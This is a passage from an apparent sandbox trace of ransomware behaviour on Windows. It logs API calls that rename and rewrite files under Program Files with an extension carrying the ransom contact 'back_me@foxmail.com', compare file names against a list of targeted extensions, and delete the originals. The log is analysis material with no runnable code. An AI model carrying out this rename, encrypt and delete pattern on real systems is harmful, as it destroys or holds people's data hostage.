Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintonotesbackground_pal.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0051.325] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.325] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.325] lstrlenW (lpString=".doc") returned 4 [0051.325] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.327] lstrlenW (lpString=".docx") returned 5 [0051.327] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.327] lstrlenW (lpString=".pdf") returned 4 [0051.327] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.327] lstrlenW (lpString=".xls") returned 4 [0051.327] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.327] lstrlenW (lpString=".xlsx") returned 5 [0051.327] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.327] lstrlenW (lpString=".ppt") returned 4 [0051.327] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.327] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.327] lstrlenW (lpString=".zip") returned 4 [0051.327] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.327] lstrlenW (lpString=".rar") returned 4 [0051.327] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.327] lstrlenW (lpString=".bz2") returned 4 [0051.327] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.327] lstrlenW (lpString=".7z") returned 3 [0051.327] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.327] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.327] lstrlenW (lpString=".dbf") returned 4 [0051.327] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.327] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.327] lstrlenW (lpString=".1cd") returned 4 [0051.327] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.327] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToNotesBackground_PAL.wmv") returned 86 [0051.327] lstrlenW (lpString=".jpg") returned 4 [0051.327] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.328] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0051.328] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.328] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.328] lstrlenW (lpString=".doc") returned 4 [0051.328] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.328] lstrlenW (lpString=".docx") returned 5 [0051.328] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.328] lstrlenW (lpString=".pdf") returned 4 [0051.328] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.328] lstrlenW (lpString=".xls") returned 4 [0051.328] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.328] lstrlenW (lpString=".xlsx") returned 5 [0051.328] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.328] lstrlenW (lpString=".ppt") returned 4 [0051.328] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.328] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.328] lstrlenW (lpString=".zip") returned 4 [0051.328] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.328] lstrlenW (lpString=".rar") returned 4 [0051.328] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.328] lstrlenW (lpString=".bz2") returned 4 [0051.328] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.328] lstrlenW (lpString=".7z") returned 3 [0051.328] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.328] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.328] lstrlenW (lpString=".dbf") returned 4 [0051.328] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.329] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.329] lstrlenW (lpString=".1cd") returned 4 [0051.329] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.329] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground.wmv") returned 83 [0051.329] lstrlenW (lpString=".jpg") returned 4 [0051.329] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.329] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmaintoscenesbackground_pal.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0051.329] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.329] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.329] lstrlenW (lpString=".doc") returned 4 [0051.329] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.329] lstrlenW (lpString=".docx") returned 5 [0051.329] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.329] lstrlenW (lpString=".pdf") returned 4 [0051.329] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.329] lstrlenW (lpString=".xls") returned 4 [0051.329] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.329] lstrlenW (lpString=".xlsx") returned 5 [0051.329] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.329] lstrlenW (lpString=".ppt") returned 4 [0051.329] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.329] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.329] lstrlenW (lpString=".zip") returned 4 [0051.329] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.330] lstrlenW (lpString=".rar") returned 4 [0051.330] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.330] lstrlenW (lpString=".bz2") returned 4 [0051.330] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.330] lstrlenW (lpString=".7z") returned 3 [0051.330] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.330] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.330] lstrlenW (lpString=".dbf") returned 4 [0051.330] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.330] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.330] lstrlenW (lpString=".1cd") returned 4 [0051.330] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.330] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainToScenesBackground_PAL.wmv") returned 87 [0051.330] lstrlenW (lpString=".jpg") returned 4 [0051.330] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.330] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0051.330] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.330] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.330] lstrlenW (lpString=".doc") returned 4 [0051.330] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.330] lstrlenW (lpString=".docx") returned 5 [0051.330] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.330] lstrlenW (lpString=".pdf") returned 4 [0051.330] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.331] lstrlenW (lpString=".xls") returned 4 [0051.331] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.331] lstrlenW (lpString=".xlsx") returned 5 [0051.331] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.331] lstrlenW (lpString=".ppt") returned 4 [0051.331] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.331] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.331] lstrlenW (lpString=".zip") returned 4 [0051.331] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.331] lstrlenW (lpString=".rar") returned 4 [0051.331] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.331] lstrlenW (lpString=".bz2") returned 4 [0051.331] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.331] lstrlenW (lpString=".7z") returned 3 [0051.331] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.331] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.331] lstrlenW (lpString=".dbf") returned 4 [0051.331] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.331] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.331] lstrlenW (lpString=".1cd") returned 4 [0051.331] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.331] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground.wmv") returned 76 [0051.331] lstrlenW (lpString=".jpg") returned 4 [0051.331] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.332] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsnotesbackground_pal.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0051.332] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.332] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.332] lstrlenW (lpString=".doc") returned 4 [0051.332] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.332] lstrlenW (lpString=".docx") returned 5 [0051.332] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.332] lstrlenW (lpString=".pdf") returned 4 [0051.332] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.332] lstrlenW (lpString=".xls") returned 4 [0051.332] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.332] lstrlenW (lpString=".xlsx") returned 5 [0051.332] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.332] lstrlenW (lpString=".ppt") returned 4 [0051.333] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.333] lstrlenW (lpString=".zip") returned 4 [0051.333] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.333] lstrlenW (lpString=".rar") returned 4 [0051.333] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.333] lstrlenW (lpString=".bz2") returned 4 [0051.333] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.333] lstrlenW (lpString=".7z") returned 3 [0051.333] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.333] lstrlenW (lpString=".dbf") returned 4 [0051.333] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.333] lstrlenW (lpString=".1cd") returned 4 [0051.333] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsNotesBackground_PAL.wmv") returned 80 [0051.333] lstrlenW (lpString=".jpg") returned 4 [0051.333] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.333] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0051.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.333] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.333] lstrlenW (lpString=".doc") returned 4 [0051.333] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.334] lstrlenW (lpString=".docx") returned 5 [0051.334] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0051.334] lstrlenW (lpString=".pdf") returned 4 [0051.334] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.334] lstrlenW (lpString=".xls") returned 4 [0051.334] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.334] lstrlenW (lpString=".xlsx") returned 5 [0051.334] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0051.334] lstrlenW (lpString=".ppt") returned 4 [0051.334] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.334] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.334] lstrlenW (lpString=".zip") returned 4 [0051.334] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.334] lstrlenW (lpString=".rar") returned 4 [0051.334] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.334] lstrlenW (lpString=".bz2") returned 4 [0051.334] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.334] lstrlenW (lpString=".7z") returned 3 [0051.334] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.334] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.334] lstrlenW (lpString=".dbf") returned 4 [0051.334] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.334] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.334] lstrlenW (lpString=".1cd") returned 4 [0051.334] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.334] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0051.334] lstrlenW (lpString=".jpg") returned 4 [0051.334] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.335] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground_pal.wmv.id-9c354b42.[back_me@foxmail.com].php")) returned 0 [0051.335] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.335] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.335] lstrlenW (lpString=".doc") returned 4 [0051.335] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0051.335] lstrlenW (lpString=".docx") returned 5 [0051.335] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1 [0051.335] lstrlenW (lpString=".pdf") returned 4 [0051.335] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0051.335] lstrlenW (lpString=".xls") returned 4 [0051.335] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0051.335] lstrlenW (lpString=".xlsx") returned 5 [0051.335] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1 [0051.335] lstrlenW (lpString=".ppt") returned 4 [0051.335] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0051.335] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.335] lstrlenW (lpString=".zip") returned 4 [0051.335] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0051.335] lstrlenW (lpString=".rar") returned 4 [0051.335] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0051.335] lstrlenW (lpString=".bz2") returned 4 [0051.335] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0051.335] lstrlenW (lpString=".7z") returned 3 [0051.335] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0051.335] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.335] lstrlenW (lpString=".dbf") returned 4 [0051.335] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0051.335] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.335] lstrlenW (lpString=".1cd") returned 4 [0051.335] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1 [0051.335] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground_PAL.wmv") returned 81 [0051.336] lstrlenW (lpString=".jpg") returned 4 [0051.336] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1 [0051.353] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.353] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.353] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0052.433] GetLastError () returned 0x0 [0052.434] ReadFile (in: hFile=0x198, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x4360, lpOverlapped=0x0) returned 1 [0052.438] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x4370, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x4370, lpOverlapped=0x0) returned 1 [0052.439] ReadFile (in: hFile=0x198, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0052.439] WriteFile (in: hFile=0x194, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0052.439] SetEndOfFile (hFile=0x194) returned 1 [0052.440] CloseHandle (hObject=0x194) returned 1 [0052.440] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.440] SetEndOfFile (hFile=0x198) returned 1 [0052.441] CloseHandle (hObject=0x198) returned 1 [0052.441] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0052.441] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl")) returned 1 [0052.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.441] lstrlenW (lpString=".doc") returned 4 [0052.441] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1 [0052.441] lstrlenW (lpString=".docx") returned 5 [0052.441] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1 [0052.441] lstrlenW (lpString=".pdf") returned 4 [0052.441] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1 [0052.441] lstrlenW (lpString=".xls") returned 4 [0052.441] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1 [0052.441] lstrlenW (lpString=".xlsx") returned 5 [0052.442] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1 [0052.442] lstrlenW (lpString=".ppt") returned 4 [0052.442] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1 [0052.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.442] lstrlenW (lpString=".zip") returned 4 [0052.442] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1 [0052.442] lstrlenW (lpString=".rar") returned 4 [0052.442] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1 [0052.442] lstrlenW (lpString=".bz2") returned 4 [0052.442] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1 [0052.442] lstrlenW (lpString=".7z") returned 3 [0052.442] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1 [0052.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.442] lstrlenW (lpString=".dbf") returned 4 [0052.442] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1 [0052.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.442] lstrlenW (lpString=".1cd") returned 4 [0052.442] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1 [0052.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned 76 [0052.442] lstrlenW (lpString=".jpg") returned 4 [0052.442] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1 [0052.443] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=34076) returned 1 [0052.443] CloseHandle (hObject=0x198) returned 1 [0052.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl")) returned 0x20 [0052.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0052.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0052.444] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.444] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0052.444] GetLastError () returned 0x0 [0052.444] ReadFile (in: hFile=0x198, 